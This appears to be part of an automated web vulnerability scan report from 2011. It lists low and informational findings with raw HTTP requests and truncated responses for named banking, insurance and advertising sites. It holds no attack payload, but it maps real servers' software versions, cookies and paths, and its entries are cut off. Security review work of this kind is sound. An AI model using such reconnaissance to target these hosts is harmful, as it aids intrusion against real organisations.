| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:30:39 GMT Content-type: text/html;charset=ISO Set-Cookie: TLTHID=741A6F2E7FD11 Set-Cookie: TLTSID=741A6F2E7FD11 Content-language: en Set-cookie: JSESSIONID=0001aplKy Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>CIGNAaccess.com - Forgotten Password - Enter User Name</title> <link rel="ST ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Firm | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/albany-times | 
| GET /flyerboard/albany-times Host: www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:50:34 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Set-Cookie: PHPSESSID=0ke9o5cho7 Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 5506 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Firm | 
| Host: | https://www.paperg.com | 
| Path: | /forgot.php | 
| GET /forgot.php HTTP/1.1 Host: www.paperg.com Connection: keep-alive Referer: http://www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=27786045 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:45:47 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Set-Cookie: PHPSESSID=fq6c4o1f1f Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 3158 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Con ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Firm | 
| Host: | http://www.placelocal.com | 
| Path: | /forgot_password.php | 
| GET /forgot_password.php HTTP/1.1 Host: www.placelocal.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.paperg.com | 
| HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Mon, 16 May 2011 15:19:40 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.2-1 Set-Cookie: PHPSESSID=3oik1g2sp4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: success=deleted; expires=Sun, 16-May-2010 15:19:39 GMT Set-Cookie: success_cookie_name Vary: Accept-Encoding Content-Length: 6267 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Firm | 
| Host: | https://www.planservices | 
| Path: | /regions/ | 
| GET /regions/ HTTP/1.1 Host: www.planservices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close | 
| HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Language: en-US Expires: 01 Nov 1990 01:00:01 GMT P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT",policyref=/w3c/p3p Set-Cookie: TESTCOOKIES=Test;expires Set-Cookie: CFID=52158672;expires=Wed Set-Cookie: CFTOKEN=42630575;expires Set-Cookie: JSESSIONID=0430e8dac Set-Cookie: PLANID=;path=/ Set-Cookie: GROUPID=;path=/ Set-Cookie: IID=;path=/ Set-Cookie: WEBUSAGE=124614;path=/ Set-Cookie: USERINTERNAL=0;path=/ Set-Cookie: VIRTDIR=regions;path=/ Date: Mon, 16 May 2011 16:46:14 GMT Connection: close <script type="text/javascript" language="javascript"> var str="launch,Bisys var urlLocation = self.location.href ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Firm | 
| Host: | https://wwwa.applyon | 
| Path: | /USCCapp/Ctl/entry | 
| GET /USCCapp/Ctl/entry Host: wwwa.applyonlinenow.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 302 Found Date: Mon, 16 May 2011 15:28:15 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2 Location: https://wwwa.applyon Content-Length: 0 Set-Cookie: JSESSIONID=0000wkGjL Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Content-Type: text/plain; charset=ISO-8859-1 Content-Language: en-US | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://ads.bridgetrack | 
| Path: | /site/rtgt.asp | 
| GET /site/rtgt.asp?BU=167&ref Host: ads.bridgetrack.com Proxy-Connection: keep-alive Referer: http://www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BTASES=SID=56027293D | 
| HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sun, 15 May 2011 15:17:16 GMT Vary: Accept-Encoding P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://ads Set-Cookie: BTA=GUID=05443B076F7 Set-Cookie: BTA167=; expires=Thu, 10-May-2012 04:00:00 GMT; path=/ Set-Cookie: BTASES=SID=56027293D Date: Mon, 16 May 2011 15:17:15 GMT Connection: close Content-Length: 0 | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://cf.addthis.com | 
| Path: | /red/p.json | 
| GET /red/p.json?rb=0&gen=1000 Host: cf.addthis.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://s7.addthis.com Cookie: uid=4dc048d9159e4ae3; psc=2; loc=US%2CMjAwMDFOQVV | 
| HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Expires: Mon, 16 May 2011 17:08:13 GMT Set-Cookie: di=1305283016.1FE P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 15-Jun-2011 17:08:13 GMT; Path=/ Content-Type: text/javascript Content-Length: 161 Date: Mon, 16 May 2011 17:08:12 GMT Connection: close _ate.ad.hrr({"urls":[ | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://cignaforhcp.cigna | 
| Path: | /ProviderTheme/themes | 
| GET /ProviderTheme/themes Host: cignaforhcp.cigna.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-length: 318 content-type: text/plain date: Mon, 16 May 2011 15:31:58 GMT last-modified: Mon, 20 Dec 2010 18:20:32 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server Set-Cookie: PD_STATEFUL_32910a44-289d ..............(.......(.. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://cignaforhcp.cigna | 
| Path: | /portal/images/arrowonly | 
| GET /portal/images/arrowonly Host: cignaforhcp.cigna.com Connection: keep-alive Referer: https://cignaforhcp.cigna User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK accept-ranges: bytes content-length: 63 content-type: image/gif date: Mon, 16 May 2011 15:35:50 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server Set-Cookie: PD_STATEFUL_fab19a1c-356c GIF89a.............!..... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://my.cigna.com | 
| Path: | /mycignatheme/js/min | 
| GET /mycignatheme/js/min Host: my.cigna.com Connection: keep-alive Referer: https://my.cigna.com/web User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-type: application/x-javascript date: Mon, 16 May 2011 15:30:36 GMT last-modified: Wed, 20 Apr 2011 17:47:00 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server Set-Cookie: PD_STATEFUL_cf31cef6-4b84 Content-Length: 168592 function progressbar(limit, met, gwidth) { calpercentage = Math.round(met*100/limit) calwidth=Math.round remwidth=Math.round output='<div class="out ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://my.cigna.com | 
| Path: | /mycignatheme/js/min | 
| GET /mycignatheme/js/min Host: my.cigna.com Connection: keep-alive Referer: https://my.cigna.com/web User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-type: application/x-javascript date: Mon, 16 May 2011 15:30:26 GMT last-modified: Wed, 20 Apr 2011 17:47:00 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server Set-Cookie: PD_STATEFUL_e87abf76-4b84 Content-Length: 168592 function progressbar(limit, met, gwidth) { calpercentage = Math.round(met*100/limit) calwidth=Math.round remwidth=Math.round output='<div class="out ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://my.cigna.com | 
| Path: | /mycignatheme/themes/html | 
| GET /mycignatheme/themes/html Host: my.cigna.com Connection: keep-alive Referer: https://my.cigna.com/web User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-length: 139 content-type: text/plain date: Mon, 16 May 2011 15:31:15 GMT last-modified: Fri, 22 Apr 2011 16:46:54 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server Set-Cookie: PD_STATEFUL_e87abf76-4b84 .PNG . ...IHDR.................... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://my.cigna.com | 
| Path: | /mycignatheme/themes/html | 
| GET /mycignatheme/themes/html Host: my.cigna.com Connection: keep-alive Referer: https://my.cigna.com/web User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-length: 139 content-type: text/plain date: Mon, 16 May 2011 15:31:16 GMT last-modified: Fri, 22 Apr 2011 16:46:54 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server Set-Cookie: PD_STATEFUL_d992271a-4b84 .PNG . ...IHDR.................... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://my.cigna.com | 
| Path: | /mycignatheme/themes/html | 
| GET /mycignatheme/themes/html Host: my.cigna.com Connection: keep-alive Referer: https://my.cigna.com/web User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 | 
| HTTP/1.1 200 OK content-language: en-US content-length: 139 content-type: text/plain date: Mon, 16 May 2011 15:31:05 GMT last-modified: Fri, 22 Apr 2011 16:46:54 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server Set-Cookie: PD_STATEFUL_cf31cef6-4b84 .PNG . ...IHDR.................... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://my.cigna.com | 
| Path: | /web/public/guest | 
| POST /web/public/guest HTTP/1.1 Host: my.cigna.com Connection: keep-alive Referer: http://www.mycigna.com/ Cache-Control: max-age=0 Origin: http://www.mycigna.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 Content-Length: 0 | 
| HTTP/1.1 200 OK content-language: en-US content-location: https://my.cigna.com/web content-type: text/html; charset=UTF-8 date: Mon, 16 May 2011 15:30:21 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server vary: User-Agent,Cookie x-old-content-length: 22481 ibm-web2-location: /web/public/guest/!ut/p cache-control: private, max-age=60 expires: Mon, 16 May 2011 15:31:21 GMT Set-Cookie: TLTSID=698A01C87FD11 Set-Cookie: TLTUID=698A01C87FD11 Set-Cookie: PD_STATEFUL_ccb88d86-4b84 Content-Length: 22491 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://my.cigna.com | 
| Path: | /web/public/guest | 
| POST /web/public/guest HTTP/1.1 Host: my.cigna.com Connection: keep-alive Referer: https://my.cigna.com/ Cache-Control: max-age=0 Origin: https://my.cigna.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=252045595 Content-Length: 0 | 
| HTTP/1.1 200 OK content-language: en-US content-location: https://my.cigna.com/web content-type: text/html; charset=UTF-8 date: Mon, 16 May 2011 15:30:33 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: IBM_HTTP_Server vary: User-Agent,Cookie x-old-content-length: 22481 ibm-web2-location: /web/public/guest/!ut/p cache-control: private, max-age=60 expires: Mon, 16 May 2011 15:31:33 GMT Set-Cookie: PD_STATEFUL_eb751ba4-4b84 Content-Length: 22491 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://regions.com | 
| Path: | / | 
| GET / HTTP/1.1 Host: regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive | 
| HTTP/1.1 302 Redirect Set-Cookie: WWW.REGIONS.COM-HTTP Content-Length: 146 Content-Type: text/html Location: https://www.regions.com Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:41:51 GMT <head><title>Document Moved</title></head> <body><h1>Object Moved</h1>This document may be found <a HREF="https://www.regions | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secure.regio | 
| Path: | /favicon.ico | 
| GET /favicon.ico HTTP/1.1 Host: secure.regionsmortgage Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 404 Not Found ntCoent-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:30:26 GMT Set-Cookie: NSC_tfdvsf.npsuhbhf-wjq Set-Cookie: rfaft2c1=3drGKRGPiL8l Set-Cookie: rfaft2c1_.regionsmortgage X-Expires-Orig: None Cache-Control: max-age=3, must-revalidate, private Cache-Control: private Set-Cookie: NSC_tfdvsf.sfhjpotnp Content-Length: 1635 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; cha ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | / | 
| GET / HTTP/1.1 Host: secureapps.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Cookie: secureapps.regions.com | 
| HTTP/1.1 403 Forbidden Set-Cookie: secureapps.regions.com Content-Length: 218 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:41:40 GMT <html><head><title>Error< <body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /OAO/DESGetFiles.aspx | 
| GET /OAO/DESGetFiles.aspx Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: secureapps.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Date: Mon, 16 May 2011 15:19:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: public Expires: Thu, 16 Jun 2011 05:00:00 GMT Content-Type: text/css; charset=utf-8 Content-Length: 804 .VAMErrorText { } .VAMBlinkText { color: White; } .VAMFieldWithError { } .VAMValSummary { color: red; } .VAMValSummary:link {color: red; text-decoration: none;} .VAMValSum ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /favicon.ico | 
| GET /favicon.ico HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 404 Not Found Set-Cookie: secureapps.regions.com Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:46 GMT <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; cha ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/DES/Appearance | 
| GET /oao/DES/Appearance Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: secureapps.regions.com | 
| HTTP/1.1 403 Forbidden Set-Cookie: secureapps.regions.com Content-Length: 1529 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:02 GMT <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <HTML><HEAD><TITLE>The page cannot be displayed</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/ErrorPage.aspx | 
| GET /oao/ErrorPage.aspx HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WT_FPC=id=2ac1f5713c | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Cache-Control: no-cache, no-store Date: Mon, 16 May 2011 15:21:02 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 9876 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><meta http-equiv="Cont ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/FormHandler.js | 
| GET /oao/FormHandler.js HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: secureapps.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 86459 Content-Type: application/x-javascript Last-Modified: Wed, 20 Apr 2011 18:24:56 GMT Accept-Ranges: bytes ETag: "04cba3f88ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:18:56 GMT ...// JScript File var IE = (document.all) ? 1 : 0; var NN4 = (document.layers) ? 1 : 0; var DOM = (document.getElementById && !document.all) ? 1 : 0; var NS7 = (document.getElementById) ? 1 : 0; var ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/Images/confirmation | 
| GET /oao/Images/confirmation Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 2319 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:06 GMT GIF89a........t....nnn... m..g. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/Images/funding.gif | 
| GET /oao/Images/funding.gif HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 3849 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:18 GMT GIF89a.......DDD......... #..G.9......&.;./($...QB. ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/Images/gettings | 
| GET /oao/Images/gettings Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 2300 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:07 GMT GIF89a................ppp ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/Images/helpIcon.gif | 
| GET /oao/Images/helpIcon.gif HTTP/1.1 Host: secureapps.regions.com Connection: keep-alive Referer: https://secureapps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId | 
| HTTP/1.1 200 OK Set-Cookie: secureapps.regions.com Content-Length: 326 Content-Type: image/gif Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT Accept-Ranges: bytes ETag: "0a61c4288ffcb1:0" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 15:19:15 GMT GIF89a......l."w.3.....w`..Y..] ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://secureapps | 
| Path: | /oao/Images/loading7.gif | 
